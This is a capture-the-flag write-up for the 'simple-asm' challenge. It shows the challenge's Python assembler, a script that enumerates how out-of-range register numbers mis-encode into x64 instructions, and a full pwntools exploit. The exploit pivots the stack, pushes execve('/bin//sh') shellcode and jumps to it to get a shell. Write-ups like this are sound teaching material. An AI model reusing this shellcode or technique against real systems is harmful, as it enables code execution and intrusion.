CSR23 simple-asm Shellcode Challenge
Solution to the Cyber Security Rumble Finals challenge simple-asm.
The challenge is straightforward. It defines a custom instruction set whose instructions are translated directly to x64 instructions and then executed at a fixed address in a no-PIE binary. The translation lacks checks, so when specific higher register numbers are used, the instructions do more than they appear to at first sight.
This is the provided challenge source code, which also runs on the remote instance:
import os
import struct
import sys
def main():
    """Read simple-asm source from stdin up to ``END``, then assemble and run it."""
    print("Input your code, followed by END", flush=True)

    # iter() with a sentinel keeps calling input() and stops (without
    # storing it) at the first line that is exactly "END".
    source = list(iter(input, "END"))

    # Translate the collected lines to machine code and execute the result.
    machine_code = compile_asm(source)
    print("Executing code", flush=True)
    execute_shellcode(machine_code)
def compile_asm(source):
    """Translate simple-asm source lines into raw machine code.

    Supported instructions are ``nul rN``, ``inc rN`` and ``add rD, rS``.
    Empty lines and lines whose first non-blank character is ``#`` are
    skipped.  Any other mnemonic/operand-count combination prints a message
    and exits the process.  Register numbers are OR-ed into the third byte
    exactly as parsed, without any range check.

    Returns the concatenated machine code as ``bytes``.
    """
    chunks = []
    for line in source:
        # Nothing to assemble for blank lines and comments.
        if not line or line.strip().startswith("#"):
            continue

        # First token is the mnemonic, the rest a comma-separated operand list.
        mnemonic, operand_text = line.split(maxsplit=1)
        operands = [parse_reg(part) for part in operand_text.split(",")]

        # Every instruction is emitted as three bytes: 0x48, an opcode byte
        # and a byte built from 0xC0 and the register number(s).
        if mnemonic == "nul" and len(operands) == 1:
            (reg,) = operands
            encoded = [0x48, 0x31, 0xC0 | reg | (reg << 3)]
        elif mnemonic == "inc" and len(operands) == 1:
            (reg,) = operands
            encoded = [0x48, 0xFF, 0xC0 | reg]
        elif mnemonic == "add" and len(operands) == 2:
            reg_dst, reg_src = operands
            encoded = [0x48, 0x01, 0xC0 | reg_dst | (reg_src << 3)]
        else:
            print(f"Unknown instruction: {line}", flush=True)
            sys.exit()

        chunks.append(bytes(encoded))
    return b"".join(chunks)
def parse_reg(reg):
    """Return the integer register number of an operand such as ``" r11"``.

    Surrounding whitespace is ignored.  The operand must begin with ``r``
    (checked with ``assert``); everything after that letter is handed to
    ``int()`` unchanged, so no upper or lower bound is enforced here.
    """
    name = reg.strip()
    assert name[:1] == "r"
    number_text = name[1:]
    return int(number_text)
def execute_shellcode(code):
    """Wrap ``code`` in a minimal ELF image held in a memfd and exec it.

    The code is padded with ``0xCC`` bytes to a multiple of 0x1000 and placed
    directly after a one-page header.  When ``os.execve`` succeeds it replaces
    the current process, so this function does not return in that case.
    """
    page = 0x1000

    # Pad the code with 0xCC up to the next page boundary; this adds nothing
    # when the length is already a multiple of the page size.
    code += b"\xcc" * (-len(code) % page)

    # Build the ELF file in memory.
    code_size = struct.pack("<Q", len(code))
    image = b"".join([
        # ELF header
        b"\x7fELF\x02\x01\x01\x03\0\0\0\0\0\0\0\0\x02\0\x3e\0\x01\0\0\0\0\0\0\x01\0\0\0\0\x40\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x40\0\x38\0\x01\0\0\0\0\0\0\0",
        # Program header
        b"\x01\0\0\0\x07\0\0\0\0\x10\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\x01\0\0\0\0",
        # The code length is written twice in a row.
        code_size * 2,
        b"\0\x10\0\0\0\0\0\0",
    ])

    # Pad the headers to a whole page, then append the code.
    image = image.ljust(page, b"\0") + code

    # Put the ELF into a memfd.  The file object is intentionally not closed:
    # the descriptor has to stay open for the execve call below.
    memfd = os.memfd_create("sc")
    out = os.fdopen(memfd, mode="wb")
    out.write(image)
    out.flush()

    # Execute the memfd with an empty environment.
    os.execve(memfd, ["sc"], {})
    # NOTE(review): os.execve raises OSError on failure instead of returning,
    # so this line is probably never reached - confirm.
    print("execve failed!", flush=True)
# Only start the challenge when this file is run as a script, not on import.
if __name__ == "__main__":
    main()
To know what we are working with, this script enumerates, for every “simple-asm” instruction and register number, the x64 instruction it is translated to:
import pwn
from itertools import permutations
from typing import Iterable, Callable, Tuple
# Set pwntools' target architecture to amd64 so that pwn.disasm() below
# decodes the generated bytes as x86-64 instructions.
pwn.context.update(arch='amd64')
def nul(reg: int) -> bytes:
    """Encode ``nul r<reg>`` exactly like the challenge's translator.

    ``reg`` is OR-ed unmasked into the third byte, both as-is and shifted
    left by three.  ``bytes()`` raises ``ValueError`` when the result does
    not fit into a single byte.
    """
    modrm = 0xC0 | reg | (reg << 3)
    return bytes((0x48, 0x31, modrm))
def inc(reg: int) -> bytes:
    """Encode ``inc r<reg>`` exactly like the challenge's translator.

    ``reg`` is OR-ed unmasked into the third byte.  ``bytes()`` raises
    ``ValueError`` when the result does not fit into a single byte.
    """
    modrm = 0xC0 | reg
    return bytes((0x48, 0xFF, modrm))
def add(reg_src: int, reg_dst: int) -> bytes:
    """Encode the challenge's ``add`` instruction for the given registers.

    Note the parameter order: the source register comes first here, whereas
    the challenge's ``add`` takes the destination as its first operand.
    ``reg_dst`` is OR-ed in as-is and ``reg_src`` shifted left by three,
    both unmasked.  ``bytes()`` raises ``ValueError`` when the result does
    not fit into a single byte.
    """
    modrm = 0xC0 | reg_dst | (reg_src << 3)
    return bytes((0x48, 0x01, modrm))
# Every register number worth trying: anything larger cannot fit in a byte.
byte = range(0x100)


def try_all(func: Callable) -> Iterable[Tuple[Tuple[int, ...], str]]:
    """Yield ``(args, disassembly)`` for every argument tuple that decodes.

    ``func`` is one of the encoder functions; it is called with every
    combination of values from ``byte`` for each of its positional
    parameters.  Combinations for which the encoder (or the disassembler)
    raises ``ValueError`` and encodings whose disassembly contains
    ``(bad)`` are skipped.
    """
    # Imported locally because the file header only imports ``permutations``.
    from itertools import product

    num_params = func.__code__.co_argcount
    # product(), unlike permutations(), also yields tuples with repeated
    # values such as (3, 3), so encodings like ``add r3, r3`` are not lost.
    for args in product(byte, repeat=num_params):
        try:
            machine_code = func(*args)
            disasm = pwn.disasm(machine_code)
        except ValueError:
            # Typically the computed third byte does not fit into a byte.
            continue
        if '(bad)' not in disasm:
            yield args, disasm
# Print every valid (arguments, disassembly) pair, one encoder after another.
for encoder in (nul, inc, add):
    for result in try_all(encoder):
        print(result)
From the output of the script we can see that we have xor rXX, rYY, inc rXX, dec rXX, rex.W call rXX, rex.W jmp rXX, rex.W push rXX and add rXX, rYY.
This is a lot to work with, especially since we are running in a no-PIE binary, that has rwx memory.
The plan for exploitation is the following:
First, we build a primitive to write an arbitrary value in any register.
This is done by first setting another register, say rbx, to one:
nul r11 # xor rbx, rbx
inc r3 # inc rbx rbx = 1
and then doubling it 64 times.
Before the i-th doubling we check whether the value we want to write has a 1 at bit i.
If so, we add rbx, which at this point is 1 << i, to the target register.
Second, we point rsp into an executable area.
into an executable area.
Next, we push the shellcode in pieces of eight bytes backwards onto our pivoted stack, constructing each piece in a register with our first primitive.
Last, we just need to jump to our shellcode, which now starts at rsp, with jmp rsp.
We could optimize this at multiple points, e.g. by filling all registers at once, but neither size nor execution time is a concern in this challenge.
Here is the full exploit:
import pwn
from typing import List
# Set pwntools' target architecture to amd64 for this exploit script.
pwn.context.update(arch='amd64')
def get_shellcode() -> List[int]:
    """Return the shellcode as a list of unsigned little-endian integers.

    The raw bytes are cut into consecutive pieces of at most eight bytes and
    each piece is converted to one integer, in order.
    """
    # short shellcode
    payload = b"j;X\x99H\xbb/bin//shRST_RWT^\x0f\x05"
    # Slice the payload into eight-byte pieces ...
    pieces = (payload[start:start + 8] for start in range(0, len(payload), 8))
    # ... and read each piece as an unsigned little-endian number.
    return [int.from_bytes(piece, 'little') for piece in pieces]
def stackpivot(shift: int = 24, slack: int = 500) -> str:
    """Return simple-asm source that moves rsp to ``(1 << shift) + slack``.

    rsp is zeroed, incremented to 1 and doubled ``shift`` times, then
    incremented ``slack`` more times.  With the defaults rsp ends up at
    0x1000000 + 500; the extra increments presumably leave room below rsp
    for the values pushed afterwards.

    Args:
        shift: number of times rsp is added to itself after being set to 1.
        slack: number of additional single increments of rsp.

    Returns:
        The newline-terminated simple-asm instructions as one string.
    """
    parts = [
        'nul r4\n',                # xor rsp, rsp
        'inc r4\n',                # inc rsp       (rsp = 1)
        'add r36, r0\n' * shift,   # add rsp, rsp  (rsp = 1 << shift)
        'inc r4\n' * slack,        # inc rsp
    ]
    return ''.join(parts)
# Stage 1: move rsp to where the shellcode will be written.
sc = stackpivot()

# Stage 2: push the shellcode, last piece first, so that the first piece
# ends up at the lowest address (where rsp points afterwards).
for qword in reversed(get_shellcode()):
    sc += 'nul r11\n'  # xor rbx, rbx
    sc += 'inc r3\n'   # inc rbx (rbx = 1)
    sc += 'nul r13\n'  # xor rbp, rbp
    # Build the value in rbp bit by bit: rbx holds 1 << i in iteration i.
    for i in range(64):
        if qword & (1 << i):
            sc += 'add r29, r0\n'  # add rbp, rbx
        sc += 'add r27, r0\n'      # add rbx, rbx
    sc += 'inc r53\n'  # push rbp

# Stage 3: transfer control to the shellcode.  0xC0 | 228 == 0xE4, which is
# the /4 form of opcode 0xFF, i.e. a jmp (not a call) through rsp.
sc += 'inc r228\n'  # jmp rsp
sc += 'END\n'

p = pwn.process(['python3', 'simple_asm.py'])
# Send bytes explicitly instead of relying on pwntools' str conversion.
p.send(sc.encode())
p.interactive()